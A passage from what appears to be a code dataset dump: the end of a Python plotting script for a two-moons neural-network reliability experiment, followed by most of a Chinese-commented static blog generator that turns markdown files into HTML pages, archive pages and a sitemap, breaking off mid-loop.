0,0 = bottom left\n unreliability_img = np.zeros((num_test_side, num_test_side), dtype=np.float)\n for batch_i, (data, targets) in enumerate(test_loader):\n print(\"batch %d / %d, %s\" % (batch_i, len(test_loader), datetime.now()))\n stdout.flush()\n\n inputs = data[:, :2]\n inds = data[:, 2:]\n inputs, targets = inputs.to(device(config.cuda)), targets.to(device(config.cuda))\n\n if config.method == \"subfunctions\":\n unreliability_i, corrects_i, polytopes_i = globals()[\"%s_metric\" % config.method](config,\n method_variables,\n model,\n inputs,\n targets,\n get_polytope_ids=True)\n else:\n raise NotImplementedError\n # unreliability.append(unreliability_i)\n # corrects.append(corrects_i)\n\n for j in range(data.shape[0]):\n polytope_str = bool_tensor_content_hash(polytopes_i[j])\n\n if not polytope_str in polytope_colours:\n polytope_colours[polytope_str] = random_colour()\n assert (inds[j][0] == int(inds[j][0]) and inds[j][1] == int(inds[j][1]))\n\n # flip the axes - x axis is actually second dimension of image!\n polytope_img[int(inds[j][1]), int(inds[j][0]), :] = polytope_colours[polytope_str]\n unreliability_img[int(inds[j][1]), int(inds[j][0])] = unreliability_i[j].item()\n print(\"polytope colours sz: %s\" % len(polytope_colours))\n\n print(\"unreliability range: %s, %s\" % (unreliability_img.max(), unreliability_img.min()))\n\n # unreliability = torch.cat(unreliability)\n # corrects = torch.cat(corrects)\n\n # ------------------------------------------------------------------------------------------------\n # Draw the plots\n # ------------------------------------------------------------------------------------------------\n\n render_space = 1.25\n\n save_prefix = \"%s_%s_%s_%s\" % (config.data, config.seed, config.method, config.suff)\n\n # 1. Original labelled data rendered (2D). Green & purple?\n fig, ax = plt.subplots(1, figsize=(4, 4))\n ax.set_xlim(-rad, rad)\n ax.set_ylim(-rad, rad)\n xs_0 = [train_loader.dataset[j][0][0].item() for j in range(len(train_loader.dataset))]\n xs_1 = [train_loader.dataset[j][0][1].item() for j in range(len(train_loader.dataset))]\n ys = [train_loader.dataset[j][1].item() for j in range(len(train_loader.dataset))]\n colours = [[\"tab:green\", \"tab:purple\"][c] for c in ys]\n ax.scatter(xs_0, xs_1, c=colours)\n ax.set_xticks([])\n ax.set_yticks([])\n ax.set_xlabel(\"Input dim 0\", fontsize=14)\n ax.set_ylabel(\"Input dim 1\", fontsize=14)\n fig.tight_layout()\n fig.savefig(osp.join(config.models_root, \"%s.png\" % cleanstr(\"%s_results_0\" % save_prefix)))\n\n # 2. Original labelled data underneath original flat model error - single layer contour plot (3D)\n fig, ax = plt.subplots(1, figsize=(4, 4), subplot_kw={\"projection\": \"3d\"})\n\n xx, yy = np.meshgrid(np.linspace(0, num_test_side - 1, num_test_side),\n np.linspace(0, num_test_side - 1, num_test_side)) # -1 in middle!!\n X = xx\n Y = yy\n whole_model_metric = (1. - acc)\n if not config.no_bound:\n whole_model_metric += torch.sqrt(\n torch.log(2. / method_variables[\"delta\"]) / (2. 
* method_variables[\"m\"])).item()\n if not config.no_log:\n whole_model_metric = np.log(whole_model_metric)\n\n Z_unreliability = whole_model_metric * np.ones(X.shape)\n\n print(\"whole_model_metric %s\" % whole_model_metric)\n print(\"Z_unreliability %s\" % np.unique(Z_unreliability))\n\n print(\"orig model acc: %s\" % acc)\n ax.plot_surface(X, Y, Z_unreliability, color=\"tab:blue\") #cmap=\"Blues\") # linewidth=0, shade=False\n ax.scatter(rescale(xs_0, rad, num_test_side), rescale(xs_1, rad, num_test_side),\n [Z_unreliability.max() * render_space] * len(xs_0), c=colours)\n ax.set_xticks([])\n ax.set_yticks([])\n # ax.set_zticks([])\n ax.set_xlabel(\"Input dim 0\", labelpad=0, fontsize=14)\n ax.set_ylabel(\"Input dim 1\", labelpad=0, fontsize=14)\n\n if (not config.no_bound) and (not config.no_log):\n # ax.text2D(0.05, 0.95, \"(logscale)\", transform=ax.transAxes)\n ax.set_zlabel(\"true error bound \\n(log)\", labelpad=20, fontsize=12)\n else:\n ax.set_zlabel(\"true error bound\", labelpad=20, fontsize=12)\n\n # ax.tick_params(axis='z', labelrotation=45)\n ax.grid(False)\n # fig.tight_layout()\n # plt.autoscale()\n plt.subplots_adjust(left=0., right=0.8, bottom=0.1, top=0.95) # as pc of full figure size!\n fig.savefig(osp.join(config.models_root, \"%s.png\" % cleanstr(\"%s_results_1\" % save_prefix)))\n\n # 3. Original data rendered with polytope identity (2D).\n # black data dots. polytopes colourful, imshow nearest - origin LOWER\n fig, ax = plt.subplots(1, figsize=(4, 4))\n ax.imshow(polytope_img, origin=\"lower\",\n interpolation=\"antialiased\") # axis from 0 to num_test_side - 1\n\n grey = [\"grey\" for c in ys]\n # ax.scatter(rescale(xs_0, rad, num_test_side), rescale(xs_1, rad, num_test_side), c=grey,\n # alpha=0.01) # no shadow\n ax.set_xticks([])\n ax.set_yticks([])\n ax.set_xlabel(\"Input dim 0\", fontsize=14)\n ax.set_ylabel(\"Input dim 1\", fontsize=14)\n fig.tight_layout()\n fig.savefig(osp.join(config.models_root, \"%s.png\" % cleanstr(\"%s_results_2\" % save_prefix)))\n\n # 4. Original labelled data underneat polytope error (3D) - colourful contour plot\n fig, ax = plt.subplots(1, figsize=(4, 4), subplot_kw={\"projection\": \"3d\"})\n plt.grid(b=None)\n\n xx, yy = np.meshgrid(np.linspace(0, num_test_side - 1, num_test_side),\n np.linspace(0, num_test_side - 1, num_test_side))\n X = xx\n Y = yy\n assert (X.shape == unreliability_img.shape)\n\n # unreliability_img = - unreliability_img # invert\n ax.plot_surface(X, Y, unreliability_img, cmap=cm.coolwarm, linewidth=0)\n ax.scatter(rescale(xs_0, rad, num_test_side), rescale(xs_1, rad, num_test_side),\n [-unreliability_img.max() * render_space] * len(xs_0),\n c=colours)\n # Placement 0, 0 would be the bottom left, 1, 1 would be the top right.\n ax.set_xticks([])\n ax.set_yticks([])\n # ax.set_zticks([])\n ax.set_xlabel(\"Input dim 0\", labelpad=0, fontsize=14)\n ax.set_ylabel(\"Input dim 1\", labelpad=0, fontsize=14)\n\n if (not config.no_bound) and (not config.no_log):\n # ax.text2D(0.05, 0.95, \"(logscale)\", transform=ax.transAxes)\n ax.set_zlabel(\"true error bound \\n (log)\", labelpad=20, fontsize=12)\n else:\n ax.set_zlabel(\"true error bound\", labelpad=20, fontsize=12)\n\n ax.grid(False)\n # fig.tight_layout()\n # plt.autoscale()\n plt.subplots_adjust(left=0., right=0.8, bottom=0.1, top=0.95) # as pc of full figure size!\n fig.savefig(osp.join(config.models_root, \"%s.png\" % cleanstr(\"%s_results_3\" % save_prefix)))\n\n # 5. 
4 but 2D.\n # print four corners values\n # No shadow!\n\n print(\"corners:\")\n print((unreliability_img[0, 0],\n unreliability_img[0, unreliability_img.shape[1] - 1],\n unreliability_img[unreliability_img.shape[1] - 1, 0],\n unreliability_img[unreliability_img.shape[1] - 1, unreliability_img.shape[1] - 1]))\n\n fig, ax = plt.subplots(1, figsize=(4, 4))\n divider = make_axes_locatable(ax)\n cax = divider.append_axes('right', size='5%', pad=0.05)\n\n # cmap=cm.coolwarm\n im = ax.imshow(unreliability_img, origin=\"lower\",\n interpolation=\"antialiased\") # axis from 0 to num_test_side - 1\n # ax.scatter(rescale(xs_0, rad, num_test_side), rescale(xs_1, rad, num_test_side), c=grey,\n # alpha=0.01)\n cbar = fig.colorbar(im, cax=cax, orientation='vertical')\n\n ax.set_xticks([])\n ax.set_yticks([])\n ax.set_xlabel(\"Input dim 0\", fontsize=14)\n ax.set_ylabel(\"Input dim 1\", fontsize=14)\n\n if (not config.no_bound) and (not config.no_log):\n # ax.set_title(\"(logscale)\")\n cbar.ax.set_ylabel(\"true error bound (log)\", rotation=90, labelpad=10, fontsize=14)\n else:\n cbar.ax.set_ylabel(\"true error bound\", rotation=90, labelpad=10, fontsize=14)\n\n fig.tight_layout()\n # plt.autoscale()\n figstr = osp.join(config.models_root, \"%s.png\" % cleanstr(\"%s_results_4\" % save_prefix))\n fig.savefig(figstr)\n\n plt.close(\"all\")\n print(\"Saved to: %s*\" % osp.join(config.models_root, save_prefix))\n\n\ndef rescale(x, rad, num_test_side):\n if isinstance(x, list): x = np.array(x)\n x = (x + rad) / (2 * rad) # [0, 1]\n return x * num_test_side\n\n\nif __name__ == \"__main__\":\n two_moons()\n","repo_name":"xu-ji/subfunctions","sub_path":"scripts/two_moons.py","file_name":"two_moons.py","file_ext":"py","file_size_in_byte":14965,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"16208362358","text":"\"\"\"\r\n*****blog.by\r\n*设计说明\r\n*使用列表存储md文件细节信息\r\n*排序等操作整理列表\r\n*编排导航页面也使用排序后的列表\r\n********************************************使用多线程!************************************\r\n\"\"\"\r\n\r\n\"\"\"\r\n2023.2.1程序更新,换模板\r\n1.post_tem.html => post.html [模板文件]\r\n2.archive_tem.html => page.html [模板文件]\r\n 原首页移到pages目录下。对Create_archive()函数进行了较大幅度修改\r\n 对temp_first 和 temp 值进行了统一,原来首页成了pages目录下面的一个子文件,链接路径也就进行了修改。\r\n3.subtle_set.html未改变。\r\n4.删除了atom.xml文件生成程序,不太使用。\r\n\"\"\"\r\n\r\n\r\nimport os, re, markdown, time, threading\r\n\r\n\"\"\"判断文件夹存在并创建\"\"\"\r\ndef isDIR(DIR):\r\n if ( False == os.path.isdir(DIR) ):\r\n os.mkdir(DIR)\r\n \r\n\"\"\"判断文件存在\"\"\"\r\ndef isFILE(FILE):\r\n if os.path.isfile(FILE):\r\n return True\r\n else:\r\n return False\r\n\r\ndef File_io(_file, Mode, code, DATA=None):\r\n with open(_file, Mode, encoding=code) as file:\r\n if Mode == \"r\":\r\n return file.read() #read 就返回数据\r\n else:\r\n file.write(DATA) #write 操作\r\n file.close()\r\n\r\n\"\"\"存储区段信息的结点 其实吧,也可以使用元组来替代tup(a, b)\"\"\"\r\nclass thread_str(object):\r\n def __init__(self,first, last):\r\n self.first = first\r\n self.last = last\r\n\r\n\"\"\"用于存放数据的结点,搭配列表使用\"\"\"\r\nclass Node(object): \r\n def __init__(self, title=None, date=None, category=None, md_url=None,topping=None, is_archive=None,use_markdownmodule=None,kwds=None, descri=None):\r\n self.title = title #标题\r\n self.date = date #创建时间\r\n self.category = category #类别\r\n self.md_url = md_url #makdown文章地址\r\n self.topping = topping #置顶\r\n self.is_archive = is_archive #archive页收录\r\n self.use_markdownmodule = use_markdownmodule #启用markdown库\r\n self.keywords = kwds #文章关键词 \r\n self.description = descri 
#文章摘要\r\n\r\nclass md2html(object):\r\n dir_public = None\r\n dir_posts = None\r\n dir_pages = None\r\n dir_extra = None\r\n pages = 0 #页数\r\n articleMax = 30 #设置每页文章数,默认值30\r\n post_num = 0 #文章数量\r\n is_only2page = False #一开始只有两页的判断\r\n template_post = None #文章模板\r\n template_acrchive = None #archive页模板 \r\n archlink_Detail = None #archive页文章链接处细节模板\r\n page_nav_l = None #各个pages里面prev next按钮\r\n page_nav_r = None \r\n #menu = None #菜单设置\r\n md_rawlist = list() #原始Md文件地址存储 \r\n thread_srtarr = list() #线程存储列表\r\n \r\n def __init__(self, base, site_name, site_UL, max_article=None, output_ALL=None, output_DETAIL=None, output_PAGE=None, output_RECENTPOSTS=None):\r\n md2html.dir_public = output_ALL\r\n md2html.dir_posts = output_DETAIL\r\n md2html.dir_pages = output_PAGE\r\n md2html.dir_extra = output_RECENTPOSTS\r\n self.base = base\r\n self.site_name = site_name\r\n self.site_url = site_UL\r\n self.arr = list() #列表,按照读取文件顺序存储文档信息,建立一种索引关系。\r\n if max_article != None:\r\n md2html.articleMax = max_article\r\n \r\n def __del__(self):\r\n print(\"程序结束, Good bye !\")\r\n\r\n \"\"\"遍历source源文件,寻址,插入列表中\"\"\"\r\n def findALLFile(self):\r\n for root, ds, fs in os.walk(self.base):\r\n for f in fs:\r\n md_l = os.path.join(root, f) \r\n parent_dir = os.path.dirname(md_l).replace(self.base, \"{}/{}\".format(self.dir_public, self.dir_posts) )\r\n isDIR( parent_dir )\r\n md2html.md_rawlist.append(md_l)\r\n \r\n \"\"\"根据原始文件地址读取文件,得出需要的细节信息\"\"\"\r\n def GetmdDetail(self, addrid): \r\n md_addr = self.md_rawlist[addrid]\r\n if md_addr != None: #传递的不是空地址\r\n try:\r\n raw_Data = File_io(md_addr, \"r\", \"utf-8\")\r\n except:\r\n print(\"文件地址不对!\")\r\n return None\r\n title = None\r\n date = None\r\n category = None\r\n private = None\r\n top = None\r\n is_archive = None\r\n use_markdownmodule = None\r\n keywords = None\r\n description = None\r\n \r\n DATA = raw_Data[:400]\r\n title_p = re.search(\"title:(.*?)\\n\", DATA)\r\n date_p = re.search(\"date:(.*?)\\n\", DATA)\r\n category_p = re.search(\"category:(.*?)\\n\", DATA)\r\n private_p = re.search(\"priv:(.*?)\\n\", DATA)\r\n top_p = re.search(\"top:(.*?)\\n\", DATA)\r\n is_archive_p = re.search(\"is_archive:(.*?)\\n\", DATA)\r\n use_markdownmodule_p = re.search(\"use_markdownmodule:(.*?)\\n\", DATA)\r\n keywords_p = re.search(\"keywords:(.*?)\\n\", DATA)\r\n description_p = re.search(\"description:(.*?)\\n\", DATA)\r\n \r\n \"\"\"title\"\"\"\r\n if title_p != None: #设置了该属性\r\n title = title_p.group(1).replace(\" \", \"\")\r\n else:\r\n title = \"无标题\"\r\n if title == \"\":\r\n title = \"无标题\"\r\n \"\"\"date\"\"\"\r\n if date_p != None:\r\n date = date_p.group(1)\r\n else:\r\n date = \"1997-01-01 19:12:00\"\r\n if date == \"\":\r\n date = \"1997-01-01 19:12:00\"\r\n \"\"\"category\"\"\"\r\n if category_p != None:\r\n category = category_p.group(1).replace(\" \", \"\")\r\n else:\r\n category = \"life\"\r\n if category == \"\":\r\n category = \"life\"\r\n \"\"\"private\"\"\"\r\n if private_p != None:\r\n private = private_p.group(1).replace(\" \", \"\")\r\n else:\r\n private = \"No\"\r\n if private == \"\":\r\n private = \"No\"\r\n \"\"\"top\"\"\"\r\n if top_p != None:\r\n top = top_p.group(1).replace(\" \", \"\")\r\n else:\r\n top = \"No\"\r\n if top == \"\":\r\n top = \"No\"\r\n \"\"\"is_archive\"\"\"\r\n if is_archive_p != None:\r\n is_archive = is_archive_p.group(1).replace(\" \", \"\")\r\n else:\r\n is_archive = \"Yes\"\r\n if is_archive == \"\":\r\n is_archive = \"Yes\"\r\n \"\"\"use_markdownmodule\"\"\"\r\n if use_markdownmodule_p != None:\r\n 
use_markdownmodule = use_markdownmodule_p.group(1)\r\n else:\r\n use_markdownmodule = \"Yes\"\r\n if use_markdownmodule == \"\":\r\n use_markdownmodule = \"Yes\"\r\n \"\"\"keywords\"\"\"\r\n if keywords_p != None:\r\n keywords = keywords_p.group(1).replace(\" \", \"\")\r\n else:\r\n keywords = \"{},{},{}\".format(title, self.site_name,category)\r\n if keywords == \"\":\r\n keywords = \"{},{},{}\".format(title, self.site_name,category)\r\n \"\"\"description\"\"\"\r\n if description_p != None:\r\n description = description_p.group(1).replace(\" \", \"\")\r\n else:\r\n description = \"{}:{}\".format(self.site_name, title)\r\n if description == \"\":\r\n description = \"{}:{}\".format(self.site_name, title)\r\n \r\n \r\n if( private != \"Yes\"):\r\n self.arr.append(Node( title, date, category, md_addr, top, is_archive, use_markdownmodule, keywords, description ))\r\n else:\r\n print(\"文章:《%s》保密%s,不生成HTML,地址为:%s\\n\"%(title, private, md_addr) ) \r\n \r\n return True\r\n else:\r\n return False\r\n \r\n \"\"\"通过md文件地址得到html文件地址\"\"\"\r\n def HTML_url(self, md_addr, parse_to_HTML=None):\r\n if parse_to_HTML == True:\r\n a = \"{}/\".format(self.base) #source\\ #linux系统为\"/\" windows系统为\"\\\"\r\n return md_addr.replace(a, \"/{}/\".format(self.dir_posts) ).replace(\".md\", \".html\") # source\\...md => /posts/...html\r\n else:\r\n return md_addr.replace(self.base, self.dir_posts).replace(\"\\\\\", \"/\").replace(\".md\", \".html\") # source/...md => posts/...html\r\n \r\n \"\"\"转为HTML\"\"\"\r\n def parse_to_HTML(self, listNumber, str):\r\n out_path = self.HTML_url('{}/{}'.format(self.dir_public, self.arr[listNumber].md_url) ) #输出地址及HTML文件名称结构\r\n \r\n \"\"\"判断需要的网页是否存在,存在就不输出,并且要排除前3篇文章。\"\"\"\r\n if os.path.isfile( out_path ) and listNumber >=3:\r\n return None\r\n \r\n raw_Data = File_io(self.arr[listNumber].md_url, \"r\", \"utf-8\") \r\n \r\n if self.arr[listNumber].use_markdownmodule == \"Yes\":\r\n html_content = markdown.markdown( raw_Data, extensions=[\"markdown.extensions.toc\", \"markdown.extensions.tables\", \"markdown.extensions.fenced_code\", \"markdown.extensions.meta\"] )\r\n else:\r\n html_content = raw_Data\r\n \r\n prev_article = None # 时间距离最远的文章为 上一篇 列表序号最大处方向\r\n next_article = None # 时间距离最近的文章为 下一篇 列表序号为0处方向\r\n \r\n \"\"\"通过标签is_archive判断是否应当编排页内的上下页导航,通过下面的操作以其达到半隐藏的目的\"\"\"\r\n if \"No\" == self.arr[listNumber].is_archive:\r\n prev_article = \"\"\r\n next_article = \"\"\r\n else:\r\n if(0 == listNumber):\r\n next_article = \"下一篇:没有了\"\r\n else:\r\n n = listNumber-1\r\n while ( (\"No\" == self.arr[n].is_archive) and ( n > 0) ): \r\n n -= 1\r\n if -1 == n:\r\n next_article = \"下一篇:没有了\"\r\n else:\r\n \"\"\"下一篇\"\"\"\r\n next_article = '下一篇:'+self.arr[n].title+'' \r\n \r\n if(self.post_num-1 == listNumber):\r\n prev_article = \"上一篇:没有了\"\r\n else:\r\n m = listNumber +1\r\n while ( (\"No\"==self.arr[m].is_archive) and ( m < (self.post_num-1) ) ):\r\n m += 1\r\n if self.post_num == m:\r\n prev_article = \"上一篇:没有了\"\r\n else:\r\n \"\"\"上一篇\"\"\"\r\n prev_article = '上一篇:'+self.arr[m].title+'' \r\n \r\n post_html_content = self.template_post.replace('{{title}}', self.arr[listNumber].title)\\\r\n .replace('{{site-name}}',self.site_name)\\\r\n .replace('{{date}}', self.arr[listNumber].date)\\\r\n .replace('{{post-content}}', html_content)\\\r\n .replace('{{category}}', self.arr[listNumber].category)\\\r\n .replace('{{prev_article}}',prev_article)\\\r\n .replace('{{next_article}}',next_article)\\\r\n .replace('{{keywords}}', self.arr[listNumber].keywords)\\\r\n 
.replace('{{description}}',self.arr[listNumber].description)\r\n #.replace(\"{{menu}}\", self.menu)\r\n File_io(out_path, \"w\", \"utf-8\", DATA=post_html_content)\r\n print('使用线程%s生成文章:《%s》,其标签为:%s,地址在:%s'%(str, self.arr[listNumber].title, self.arr[listNumber].category, out_path))\r\n \r\n \"\"\"生成目录,定制的,没有办法通用\"\"\"\r\n def Create_archive(self):\r\n print('生成目录中')\r\n temp = self.archlink_Detail[0]\r\n #temp_first = self.archlink_Detail[1]\r\n temp_first = temp\r\n page_nav_l = self.page_nav_l\r\n page_nav_r = self.page_nav_r\r\n posts_url = None\r\n if (self.post_num <= self.articleMax): #只有一页 a\r\n print(\"a\")\r\n s1 = ''\r\n for i in range(0, self.post_num): \r\n if self.arr[i].is_archive == \"Yes\":\r\n a = temp_first.replace('{{date}}',self.arr[i].date.replace(\" \", \"\")[0:10])\\\r\n .replace('{{md_url}}',self.HTML_url(self.arr[i].md_url))\\\r\n .replace('{{post_name}}',self.arr[i].title) \r\n s1 = s1+\"\\n\\t\\t\"+a\r\n posts_url = \"{}/{}/index.html\".format(self.dir_public,self.dir_pages)\r\n File_io(posts_url, \"w\", \"utf-8\", \\\r\n DATA=self.template_acrchive.replace('{{page_nav}}',s1)\\\r\n .replace('{{title}}',self.site_name)\\\r\n .replace('{{site-name}}',self.site_name)\\\r\n .replace('{{nav}}','') \\\r\n #.replace(\"{{menu}}\", self.menu) \r\n )\r\n self.sitemap(posts_url, Mode=\"a\")\r\n elif(self.pages == 1): #第一页没有pre b\r\n print(\"b\")\r\n s1 = ''\r\n for i in range(0, self.articleMax): \r\n if self.arr[i].is_archive == \"Yes\":\r\n a = temp_first.replace('{{date}}',self.arr[i].date.replace(\" \", \"\")[0:10])\\\r\n .replace('{{md_url}}',self.HTML_url(self.arr[i].md_url))\\\r\n .replace('{{post_name}}',self.arr[i].title) \r\n s1 = s1+\"\\n\\t\\t\"+a\r\n posts_url = \"{}/{}/index.html\".format(self.dir_public,self.dir_pages)\r\n File_io(posts_url, \"w\", \"utf-8\",\\\r\n DATA = self.template_acrchive.replace('{{page_nav}}',s1)\\\r\n .replace('{{title}}',self.site_name)\\\r\n .replace('{{site-name}}',self.site_name)\\\r\n .replace('{{nav}}',page_nav_r.replace('{{right-link}}','{}.html'.format( self.pages+1 ) ) )\\\r\n #.replace('{{nav}}',page_nav_r.replace('{{right-link}}','{}/{}.html'.format( self.dir_pages,str(self.pages+1) ) ) )\\\r\n #.replace(\"{{menu}}\", self.menu) \\\r\n )\r\n self.sitemap(posts_url,Mode=\"a\")\r\n elif(self.pages == 2 and (self.is_only2page == False) ): #由递归衰减而到的第2页 c\r\n print(\"c\")\r\n s1 = ''\r\n for i in range(self.articleMax, self.pages*self.articleMax): \r\n if self.arr[i].is_archive == \"Yes\":\r\n a = temp.replace('{{date}}',self.arr[i].date.replace(\" \", \"\")[0:10])\\\r\n .replace('{{md_url}}',self.HTML_url(self.arr[i].md_url))\\\r\n .replace('{{post_name}}',self.arr[i].title) \r\n s1 = s1+\"\\n\\t\\t\"+a\r\n posts_url = '{}/{}/{}.html'.format(self.dir_public, self.dir_pages, self.pages)\r\n File_io(posts_url, \"w\", \"utf-8\", \\\r\n DATA = self.template_acrchive.replace('{{page_nav}}',s1)\\\r\n .replace('{{title}}',\"第{}页|{}\".format(str(self.pages), self.site_name) )\\\r\n .replace('{{site-name}}',self.site_name)\\\r\n .replace('{{nav}}', page_nav_l.replace('{{left-link}}','index.html')+page_nav_r.replace('{{right-link}}',str(self.pages+1)+'.html'))\\\r\n #.replace(\"{{menu}}\", self.menu) \r\n )\r\n self.sitemap(posts_url,Mode=\"a\") \r\n elif(self.is_only2page): #如果一开始就是只有2页便执行如下代码 d\r\n print(\"d\")\r\n s1 = ''\r\n for i in range(self.articleMax, self.post_num): \r\n if self.arr[i].is_archive == \"Yes\": \r\n a = temp.replace('{{date}}',self.arr[i].date.replace(\" \", \"\")[0:10])\\\r\n 
.replace('{{md_url}}',self.HTML_url(self.arr[i].md_url))\\\r\n .replace('{{post_name}}',self.arr[i].title) \r\n s1 = s1+\"\\n\\t\\t\"+a\r\n posts_url = '{}/{}/{}.html'.format(self.dir_public, self.dir_pages, self.pages)\r\n File_io(posts_url, \"w\", \"utf-8\",\\\r\n DATA = self.template_acrchive.replace('{{page_nav}}',s1)\\\r\n .replace('{{title}}',\"第{}页|{}\".format(str(self.pages), self.site_name) )\\\r\n .replace('{{site-name}}',self.site_name)\\\r\n .replace('{{nav}}', page_nav_l.replace('{{left-link}}','index.html'))\\\r\n #.replace(\"{{menu}}\", self.menu) \\\r\n ) \r\n self.sitemap(posts_url, Mode=\"a\")\r\n elif(self.pages*self.articleMax >= self.post_num and ((self.pages-1)*self.articleMax <= self.post_num ) ): #最后一页 e\r\n print(\"e\")\r\n s1 = '' \r\n for i in range((self.pages-1)*self.articleMax, self.post_num):\r\n if self.arr[i].is_archive == \"Yes\":\r\n a = temp.replace('{{date}}',self.arr[i].date.replace(\" \", \"\")[0:10])\\\r\n .replace('{{md_url}}',self.HTML_url(self.arr[i].md_url))\\\r\n .replace('{{post_name}}',self.arr[i].title) \r\n s1 = s1+\"\\n\\t\\t\"+a\r\n posts_url = '{}/{}/{}.html'.format(self.dir_public, self.dir_pages, self.pages)\r\n File_io(posts_url, \"w\", \"utf-8\",\\\r\n DATA = self.template_acrchive.replace('{{page_nav}}',s1)\\\r\n .replace('{{title}}',\"第{}页|{}\".format(str(self.pages), self.site_name) )\\\r\n .replace('{{site-name}}',self.site_name)\\\r\n .replace('{{nav}}', page_nav_l.replace('{{left-link}}',str(self.pages-1)+'.html'))\\\r\n #.replace(\"{{menu}}\", self.menu) \\\r\n )\r\n self.sitemap(posts_url, Mode=\"a\") \r\n else: #一般页面 f\r\n print(\"f\")\r\n s1 = ''\r\n for i in range((self.pages-1)*self.articleMax, (self.pages-1)*self.articleMax+self.articleMax):\r\n if self.arr[i].is_archive == \"Yes\":\r\n a = temp.replace('{{date}}',self.arr[i].date.replace(\" \", \"\")[0:10])\\\r\n .replace('{{md_url}}',self.HTML_url(self.arr[i].md_url))\\\r\n .replace('{{post_name}}',self.arr[i].title) \r\n s1 = s1+\"\\n\\t\\t\"+a\r\n posts_url = '{}/{}/{}.html'.format(self.dir_public, self.dir_pages, self.pages)\r\n File_io(posts_url, \"w\", \"utf-8\",\\\r\n DATA = self.template_acrchive.replace('{{page_nav}}',s1)\\\r\n .replace('{{title}}',\"第{}页|{}\".format(str(self.pages), self.site_name) )\\\r\n .replace('{{site-name}}',self.site_name)\\\r\n .replace('{{nav}}', page_nav_l.replace('{{left-link}}',str(self.pages-1)+'.html')+page_nav_r.replace('{{right-link}}',\\\r\n str(self.pages+1)+'.html'))\\\r\n #.replace(\"{{menu}}\", self.menu) \\\r\n )\r\n self.sitemap(posts_url ,Mode=\"a\")\r\n self.pages -=1\r\n if self.pages >0:\r\n self.Create_archive()\r\n \r\n \"\"\"生成站点地图sitemap\"\"\"\r\n def sitemap(self, URL=None, Mode=\"w\"): \r\n if URL == None:\r\n sitemapstring = \"\"\r\n for i in self.arr:\r\n sitemapstring = sitemapstring + self.site_url +\"/\"+self.HTML_url(i.md_url) + \"\\n\"\r\n try:\r\n File_io(\"{}/sitemap.txt\".format(self.dir_public) , Mode, \"utf-8\", DATA= sitemapstring)\r\n except:\r\n return False\r\n else:\r\n try:\r\n File_io(\"{}/sitemap.txt\".format(self.dir_public) , Mode, \"utf-8\", DATA=\"{}{}\\n\".format( self.site_url, URL.replace(self.dir_public, \"\") ) )\r\n except:\r\n return False\r\n return True\r\n \r\n \"\"\"线程调用函数\"\"\"\r\n def parse_main(self, thread_str, str):\r\n first = thread_str.first\r\n last = thread_str.last\r\n if str == \"PreGetmdDetail\":\r\n for i in range(first, last):\r\n self.GetmdDetail(i)\r\n print(\"id: %s\"%i)\r\n else:\r\n for i in range(first, last): \r\n self.parse_to_HTML(i, str)\r\n \r\n 
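# CreatNode (below) splits [0, length) into thread_num contiguous index ranges via\r\n    # integer division, e.g. length=10, thread_num=5 -> (0,2),(2,4),(4,6),(6,8),(8,10);\r\n    # parse_main (above) then walks one such [first, last) slice per worker thread.\r\n    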
\"\"\"按长度确定节点可控制的长度,以此创建节点\"\"\"\r\n def CreatNode(self, length, thread_num):\r\n for i in range(thread_num):\r\n self.thread_srtarr.append( thread_str( i*length//thread_num, (i+1)*length//thread_num ) )\r\n print(\"已创建%s个结点用于存储区段信息\"%thread_num)\r\n \r\n \r\n \"\"\"最近文章\"\"\"\r\n def Recent_posts(self):\r\n out_file = \"{}/{}/recent_posts.html\".format(self.dir_public, self.dir_extra) #_public/extra/recent_posts.html\r\n s = '
<h3>Recent Posts</h3>\\n<ul>\\n'\r\n        for k in range(8):\r\n            s1 = '\\t<li><a href=\"{}\">{}</a></li>\\n'.format(self.HTML_url( self.arr[k].md_url ) , self.arr[k].title)\r\n            s += s1\r\n        s += \"</ul>
\\n\"\r\n with open(out_file, \"w\", encoding=\"utf-8\") as renc:\r\n renc.write(s)\r\n renc.close()\r\n \r\n \"\"\"\"主函数 调度用\"\"\"\r\n def Main(self, dir_template):\r\n temp_posts = \"{}/post.html\".format(dir_template) #post_tem.html => post.html\r\n temp_archive = \"{}/page.html\".format(dir_template) #archive_tem.html => page.html 原首页移到pages目录下。生成首页函数进行了修改。\r\n temp_subtle = \"{}/subtle_set.html\".format(dir_template) #未变\r\n \r\n isDIR(dir_template)\r\n \r\n if ( isFILE(temp_posts) and isFILE(temp_archive) and isFILE(temp_subtle) ):\r\n \"\"\"单页模板\"\"\"\r\n self.template_post = File_io(temp_posts, \"r\", \"utf-8\")\r\n \r\n \"\"\"导航页模板\"\"\"\r\n self.template_acrchive = File_io(temp_archive, \"r\", \"utf-8\")\r\n \r\n \"\"\"填充上面两个��板需要的小玩意\"\"\"\r\n archlink_Detail_data = File_io(temp_subtle, \"r\", \"utf-8\")\r\n \r\n self.archlink_Detail = re.compile(\"archive_post:(.*?)\\n\", re.S).findall(archlink_Detail_data) \r\n self.page_nav_l = re.search('page_nav_l:(.*?)\\n', archlink_Detail_data, re.S).group(1)\r\n self.page_nav_r = re.search('page_nav_r:(.*?)\\n', archlink_Detail_data, re.S).group(1)\r\n \"\"\"2022.9.3更新:使用jQuery load形式加载导航,舍弃之前做法。\"\"\"\r\n #self.menu = re.search(\"menu:(.*?)\\n\", archlink_Detail_data, re.S).group(1)\r\n else:\r\n print(\"模板文件夹里面欠缺必要的文件!\\n 请参考:https://github.com/qing2zijin/staticblog 进行搭建\")\r\n return False\r\n \r\n \"\"\"多线程读取文件,得到文件的细节\"\"\"\r\n self.findALLFile()\r\n len_md = len( self.md_rawlist )\r\n \r\n thread_list = list()\r\n thread_num = 5\r\n \r\n self.CreatNode(len_md, thread_num)\r\n \r\n \"\"\"使用线程读取md文件细节\"\"\"\r\n \r\n if len_md >= 40:\r\n for i in range(thread_num):\r\n thread_list.append( threading.Thread( target=self.parse_main, args=( self.thread_srtarr[i] , \"PreGetmdDetail\" ) ) )\r\n for i in range(thread_num):\r\n thread_list[i].start()\r\n \r\n for i in range(thread_num):\r\n thread_list[i].join()\r\n else:\r\n for k in range(len_md):\r\n self.GetmdDetail(k)\r\n\r\n thread_list.clear() #清空线程列表\r\n self.md_rawlist.clear()\r\n \r\n md2html.post_num = len(self.arr)\r\n if self.post_num == 0:\r\n return False\r\n \r\n \"\"\"直接插入排序\"\"\"\r\n if self.post_num >=2:\r\n for i in range(1, 